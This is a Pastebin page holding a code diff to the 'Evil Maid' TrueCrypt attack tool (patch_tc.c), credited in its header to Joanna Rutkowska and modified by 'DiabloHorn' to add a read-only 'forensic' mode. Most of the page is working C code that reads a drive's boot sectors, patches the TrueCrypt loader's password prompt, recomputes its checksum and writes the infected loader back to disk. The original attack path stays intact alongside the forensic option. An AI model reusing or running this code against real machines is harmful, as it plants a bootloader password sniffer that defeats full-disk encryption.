daily pastebin goal
80%
SHARE
TWEET

DiabloHorn

a guest Mar 23rd, 2014 560 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. --- patch_tc.c  2009-10-13 20:06:07.000000000 +0200
  2. +++ patch_tc_modified.c 2014-03-23 22:14:49.073346732 +0100
  3. @@ -1,3 +1,13 @@
  4. +/*
  5. +    Original blog post: http://theinvisiblethings.blogspot.nl/2009/10/evil-maid-goes-after-truecrypt.html
  6. +    Original src download: http://invisiblethingslab.com/resources/evilmaid/evilmaid-src-1.0.tgz
  7. +    Original Author: Joanna Rutkowska
  8. +    Modified by: DiabloHorn
  9. +    
  10. +    Slight modification to permit the saving of the sectors and the unzipped
  11. +    second loader without modifying the original image / device
  12. +*/
  13. +
  14.  #include <stdio.h>
  15.  #include <stdlib.h>
  16.  #include <fcntl.h>
  17. @@ -16,6 +26,7 @@
  18.  
  19.  typedef enum {FALSE = 0, TRUE} bool;
  20.  
  21. +int do_forensically = 0;
  22.  
  23.  bool SaveSectors (
  24.         void* Sectors,
  25. @@ -217,10 +228,12 @@
  26.                 return FALSE;
  27.  
  28.         uCompressedLoaderSize = *(unsigned short*) & pFirstSectors[TC_BOOT_SECTOR_LOADER_LENGTH_OFFSET];
  29. +
  30.         if (uCompressedLoaderSize > (uSectorsCount - 5) * SECTOR_SIZE)
  31.                 return FALSE;
  32.  
  33.         uChecksum = GetChecksum (&pFirstSectors[SECTOR_SIZE], 4 * SECTOR_SIZE + uCompressedLoaderSize);
  34. +
  35.         if (*(unsigned long*) & pFirstSectors[TC_BOOT_SECTOR_LOADER_CHECKSUM_OFFSET] != uChecksum)
  36.                 return FALSE;
  37.  
  38. @@ -259,7 +272,7 @@
  39.  
  40.         uCompressedLoaderSize = *(unsigned short*) & pFirstSectors[TC_BOOT_SECTOR_LOADER_LENGTH_OFFSET];
  41.         printf ("PatchTrueCrypt(): Compressed loader size: %d bytes\n", uCompressedLoaderSize);
  42. -
  43. +    printf ("PatchTrueCrypt(): Saved checksum 0x%X\n", (*(unsigned long*) & pFirstSectors[TC_BOOT_SECTOR_LOADER_CHECKSUM_OFFSET]));
  44.         // in MBR:
  45.  
  46.         // B9 FF XX   mov cx, 0xXXff  ; TC_BOOT_MEMORY_REQUIRED * 1024 - TC_COM_EXECUTABLE_OFFSET - 1
  47. @@ -297,124 +310,125 @@
  48.         }
  49.  
  50.         printf ("PatchTrueCrypt(): Decompression successful\n");
  51. +    if(!do_forensically){
  52. +           hDecompressedLoader = open (LOADER, O_RDONLY);
  53. +           if (hDecompressedLoader < 0) {
  54. +                   printf ("PatchTrueCrypt(): Failed to open %s, last error %d\n", LOADER, errno);
  55. +                   return FALSE;
  56. +           }
  57. +
  58. +           if (fstat (hDecompressedLoader, &FileStatStruct) == -1) {
  59. +                   printf ("PatchTrueCrypt(): Cannot stat file, error %d\n", errno);
  60. +                   close (hDecompressedLoader);
  61. +                   return FALSE;
  62. +           }
  63. +           uDecompressedLoaderSize = FileStatStruct.st_size;
  64. +
  65. +           printf ("PatchTrueCrypt(): Decompressed loader physical size: %d bytes\n", uDecompressedLoaderSize);
  66. +
  67. +           if (uDecompressedLoaderSize > uLoaderMemorySize) {
  68. +                   printf ("PatchTrueCrypt(): Memory size taken from MBR contradicts the decompressed binary size\n");
  69. +                   close (hDecompressedLoader);
  70. +                   return FALSE;
  71. +           }
  72. +
  73. +           pDecompressedLoader = malloc (uLoaderMemorySize);
  74. +           if (!pDecompressedLoader) {
  75. +                   printf ("PatchTrueCrypt(): Failed to allocate memory for the decompressed loader\n");
  76. +                   close (hDecompressedLoader);
  77. +                   return FALSE;
  78. +           }
  79. +           memset (pDecompressedLoader, 0, uLoaderMemorySize);
  80. +
  81. +           nbRead = read (hDecompressedLoader, pDecompressedLoader, uDecompressedLoaderSize);
  82. +           if (nbRead != uDecompressedLoaderSize) {
  83. +                   printf
  84. +                           ("PatchTrueCrypt(): ReadFile() failed (last error %d) while reading the decompressed loader\n",
  85. +                            errno);
  86. +                   free (pDecompressedLoader);
  87. +                   close (hDecompressedLoader);
  88. +                   return FALSE;
  89. +           }
  90.  
  91. -       hDecompressedLoader = open (LOADER, O_RDONLY);
  92. -       if (hDecompressedLoader < 0) {
  93. -               printf ("PatchTrueCrypt(): Failed to open %s, last error %d\n", LOADER, errno);
  94. -               return FALSE;
  95. -       }
  96. -
  97. -       if (fstat (hDecompressedLoader, &FileStatStruct) == -1) {
  98. -               printf ("PatchTrueCrypt(): Cannot stat file, error %d\n", errno);
  99. -               close (hDecompressedLoader);
  100. -               return FALSE;
  101. -       }
  102. -       uDecompressedLoaderSize = FileStatStruct.st_size;
  103. -
  104. -       printf ("PatchTrueCrypt(): Decompressed loader physical size: %d bytes\n", uDecompressedLoaderSize);
  105. -
  106. -       if (uDecompressedLoaderSize > uLoaderMemorySize) {
  107. -               printf ("PatchTrueCrypt(): Memory size taken from MBR contradicts the decompressed binary size\n");
  108. -               close (hDecompressedLoader);
  109. -               return FALSE;
  110. -       }
  111. -
  112. -       pDecompressedLoader = malloc (uLoaderMemorySize);
  113. -       if (!pDecompressedLoader) {
  114. -               printf ("PatchTrueCrypt(): Failed to allocate memory for the decompressed loader\n");
  115. -               close (hDecompressedLoader);
  116. -               return FALSE;
  117. -       }
  118. -       memset (pDecompressedLoader, 0, uLoaderMemorySize);
  119. -
  120. -       nbRead = read (hDecompressedLoader, pDecompressedLoader, uDecompressedLoaderSize);
  121. -       if (nbRead != uDecompressedLoaderSize) {
  122. -               printf
  123. -                       ("PatchTrueCrypt(): ReadFile() failed (last error %d) while reading the decompressed loader\n",
  124. -                        errno);
  125. -               free (pDecompressedLoader);
  126. -               close (hDecompressedLoader);
  127. -               return FALSE;
  128. -       }
  129. -
  130. -
  131. -       close (hDecompressedLoader);
  132. -       unlink (LOADER);
  133. -
  134. -/*
  135. -       if (!SaveSectors (pDecompressedLoader, uLoaderMemorySize, "unc")) {
  136. -               return FALSE;
  137. -       }
  138. -*/
  139. -
  140. -       pUncompressedPatchedLoader = NULL;
  141. -       uPatchedLoaderMemorySize = 0;
  142. -       if (!PatchAskPassword
  143. -           (pDecompressedLoader, uLoaderMemorySize, &pUncompressedPatchedLoader, &uPatchedLoaderMemorySize,
  144. -               pbAlreadyInfected)) {
  145. -               printf ("PatchTrueCrypt(): PatchAskPassword() failed\n");
  146. -               free (pDecompressedLoader);
  147. -               return FALSE;
  148. -       }
  149. -
  150. -       free (pDecompressedLoader);
  151.  
  152. -       *(unsigned short*) & pFirstSectors[uLoaderMemorySizeMBROffset] =
  153. -               ALIGN (uPatchedLoaderMemorySize, 0x400) - 1 - TC_COM_EXECUTABLE_OFFSET;
  154. -
  155. -       if (!SaveSectors (pUncompressedPatchedLoader, uPatchedLoaderMemorySize, PATCHED_LOADER)) {
  156. -               free (pUncompressedPatchedLoader);
  157. -               return FALSE;
  158. -       }
  159. -
  160. -       free (pUncompressedPatchedLoader);
  161. -
  162. -       unlink (PATCHED_LOADER_COMPRESSED);
  163. -
  164. -       printf ("PatchTrueCrypt(): Compressing the patched loader\n");
  165. -
  166. -       if (WEXITSTATUS(system("gzip -n --best -f " PATCHED_LOADER)) != 0) {
  167. -               printf ("PatchTrueCrypt(): Compression failed\n");
  168. -               return FALSE;
  169. -       }
  170. -
  171. -       printf ("PatchTrueCrypt(): Compression successful\n");
  172. -
  173. -       hCompressedPatchedLoader = open (PATCHED_LOADER_COMPRESSED, O_RDONLY);
  174. -       if (hCompressedPatchedLoader < 0) {
  175. -               printf ("PatchTrueCrypt(): Failed to open %s, last error %d\n", LOADER, errno);
  176. -               return FALSE;
  177. -       }
  178. -
  179. -       if (fstat (hCompressedPatchedLoader, &FileStatStruct) == -1) {
  180. -               printf ("PatchTrueCrypt(): Cannot stat file, error %d\n", errno);
  181. -               close (hCompressedPatchedLoader);
  182. -               return FALSE;
  183. -       }
  184. -       uCompressedPatchedLoaderSize = FileStatStruct.st_size;
  185. -
  186. -
  187. -       printf ("PatchTrueCrypt(): Compressed patched loader size: %d bytes\n", uCompressedPatchedLoaderSize);
  188. +           close (hDecompressedLoader);
  189. +           unlink (LOADER);    
  190. +      
  191.  
  192. -       nbRead = read (hCompressedPatchedLoader, &pFirstSectors[5 * SECTOR_SIZE], uCompressedPatchedLoaderSize);
  193. -       if (nbRead != uCompressedPatchedLoaderSize) {
  194. -               printf
  195. -                       ("PatchTrueCrypt(): ReadFile() failed (last error %d) while reading the compressed loader\n",
  196. -                        errno);
  197. -               close (hCompressedPatchedLoader);
  198. -               return FALSE;
  199. -       }
  200. +    /*
  201. +           if (!SaveSectors (pDecompressedLoader, uLoaderMemorySize, "unc")) {
  202. +                   return FALSE;
  203. +           }
  204. +    */
  205. +
  206. +           pUncompressedPatchedLoader = NULL;
  207. +           uPatchedLoaderMemorySize = 0;
  208. +           if (!PatchAskPassword
  209. +               (pDecompressedLoader, uLoaderMemorySize, &pUncompressedPatchedLoader, &uPatchedLoaderMemorySize,
  210. +                   pbAlreadyInfected)) {
  211. +                   printf ("PatchTrueCrypt(): PatchAskPassword() failed\n");
  212. +                   free (pDecompressedLoader);
  213. +                   return FALSE;
  214. +           }
  215. +
  216. +           free (pDecompressedLoader);
  217. +
  218. +           *(unsigned short*) & pFirstSectors[uLoaderMemorySizeMBROffset] =
  219. +                   ALIGN (uPatchedLoaderMemorySize, 0x400) - 1 - TC_COM_EXECUTABLE_OFFSET;
  220. +
  221. +           if (!SaveSectors (pUncompressedPatchedLoader, uPatchedLoaderMemorySize, PATCHED_LOADER)) {
  222. +                   free (pUncompressedPatchedLoader);
  223. +                   return FALSE;
  224. +           }
  225. +
  226. +           free (pUncompressedPatchedLoader);
  227. +
  228. +           unlink (PATCHED_LOADER_COMPRESSED);
  229. +
  230. +           printf ("PatchTrueCrypt(): Compressing the patched loader\n");
  231. +
  232. +           if (WEXITSTATUS(system("gzip -n --best -f " PATCHED_LOADER)) != 0) {
  233. +                   printf ("PatchTrueCrypt(): Compression failed\n");
  234. +                   return FALSE;
  235. +           }
  236. +
  237. +           printf ("PatchTrueCrypt(): Compression successful\n");
  238. +
  239. +           hCompressedPatchedLoader = open (PATCHED_LOADER_COMPRESSED, O_RDONLY);
  240. +           if (hCompressedPatchedLoader < 0) {
  241. +                   printf ("PatchTrueCrypt(): Failed to open %s, last error %d\n", LOADER, errno);
  242. +                   return FALSE;
  243. +           }
  244. +
  245. +           if (fstat (hCompressedPatchedLoader, &FileStatStruct) == -1) {
  246. +                   printf ("PatchTrueCrypt(): Cannot stat file, error %d\n", errno);
  247. +                   close (hCompressedPatchedLoader);
  248. +                   return FALSE;
  249. +           }
  250. +           uCompressedPatchedLoaderSize = FileStatStruct.st_size;
  251. +
  252. +
  253. +           printf ("PatchTrueCrypt(): Compressed patched loader size: %d bytes\n", uCompressedPatchedLoaderSize);
  254. +
  255. +           nbRead = read (hCompressedPatchedLoader, &pFirstSectors[5 * SECTOR_SIZE], uCompressedPatchedLoaderSize);
  256. +           if (nbRead != uCompressedPatchedLoaderSize) {
  257. +                   printf
  258. +                           ("PatchTrueCrypt(): ReadFile() failed (last error %d) while reading the compressed loader\n",
  259. +                            errno);
  260. +                   close (hCompressedPatchedLoader);
  261. +                   return FALSE;
  262. +           }
  263.  
  264.        
  265. -       close (hCompressedPatchedLoader);
  266. -       unlink (PATCHED_LOADER_COMPRESSED);
  267. +           close (hCompressedPatchedLoader);
  268. +           unlink (PATCHED_LOADER_COMPRESSED);
  269.  
  270. -       uChecksum = GetChecksum (&pFirstSectors[SECTOR_SIZE], 4 * SECTOR_SIZE + uCompressedPatchedLoaderSize);
  271. -       printf ("PatchTrueCrypt(): New checksum: 0x%X\n", uChecksum);
  272. -
  273. -       *(unsigned long*) & pFirstSectors[TC_BOOT_SECTOR_LOADER_CHECKSUM_OFFSET] = uChecksum;
  274. -       *(unsigned short*) & pFirstSectors[TC_BOOT_SECTOR_LOADER_LENGTH_OFFSET] = (short) uCompressedPatchedLoaderSize;
  275. +           uChecksum = GetChecksum (&pFirstSectors[SECTOR_SIZE], 4 * SECTOR_SIZE + uCompressedPatchedLoaderSize);
  276. +           printf ("PatchTrueCrypt(): New checksum: 0x%X\n", uChecksum);
  277.  
  278. +           *(unsigned long*) & pFirstSectors[TC_BOOT_SECTOR_LOADER_CHECKSUM_OFFSET] = uChecksum;
  279. +           *(unsigned short*) & pFirstSectors[TC_BOOT_SECTOR_LOADER_LENGTH_OFFSET] = (short) uCompressedPatchedLoaderSize;
  280. +    }
  281.         return TRUE;
  282.  }
  283.  
  284. @@ -458,11 +472,15 @@
  285.  
  286.         printf (VER_STRING);
  287.  
  288. -       if (argc != 2) {
  289. +       if (argc < 2) {
  290.                 printf ("Usage: %s <target>\n", argv[0]);
  291.                 return 1;
  292.         }
  293. -
  294. +    
  295. +    if( argc == 3){
  296. +        do_forensically = 1;
  297. +    }
  298. +    
  299.         if (!ReadFirstSectors (argv[1], SECTORS_TO_BACKUP, (char**)&pFirstSectors, &hDevice)) {
  300.                 return 2;
  301.         }
  302. @@ -499,24 +517,25 @@
  303.                         return 5;
  304.                 }
  305.         }
  306. +    if(!do_forensically){
  307. +           lseek (hDevice, 0, SEEK_SET);
  308.  
  309. -       lseek (hDevice, 0, SEEK_SET);
  310. -
  311. -       nbWritten = write (hDevice, pFirstSectors, SECTORS_TO_BACKUP * SECTOR_SIZE);
  312. -       if (nbWritten != SECTORS_TO_BACKUP * SECTOR_SIZE) {
  313. -               printf ("Failed to update the first sectors of a device, last error %d\n", errno);
  314. -               close (hDevice);
  315. -               //unlink (szBackupName);
  316. -               return FALSE;
  317. -       }
  318. -
  319. -/*     if (!SaveSectors (pFirstSectors, SECTORS_TO_BACKUP * SECTOR_SIZE, "patched_image")) {
  320. -               printf ("SaveSectors() failed to backup first %d sectors of the drive\n", SECTORS_TO_BACKUP);
  321. -               free (pFirstSectors);
  322. -               close (hDevice);
  323. -               return;
  324. -       }
  325. -*/
  326. +           nbWritten = write (hDevice, pFirstSectors, SECTORS_TO_BACKUP * SECTOR_SIZE);
  327. +           if (nbWritten != SECTORS_TO_BACKUP * SECTOR_SIZE) {
  328. +                   printf ("Failed to update the first sectors of a device, last error %d\n", errno);
  329. +                   close (hDevice);
  330. +                   //unlink (szBackupName);
  331. +                   return FALSE;
  332. +           }
  333. +
  334. +    /* if (!SaveSectors (pFirstSectors, SECTORS_TO_BACKUP * SECTOR_SIZE, "patched_image")) {
  335. +                   printf ("SaveSectors() failed to backup first %d sectors of the drive\n", SECTORS_TO_BACKUP);
  336. +                   free (pFirstSectors);
  337. +                   close (hDevice);
  338. +                   return;
  339. +           }
  340. +    */        
  341. +    }
  342.         free (pFirstSectors);
  343.         close (hDevice);
  344.         return 0;
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top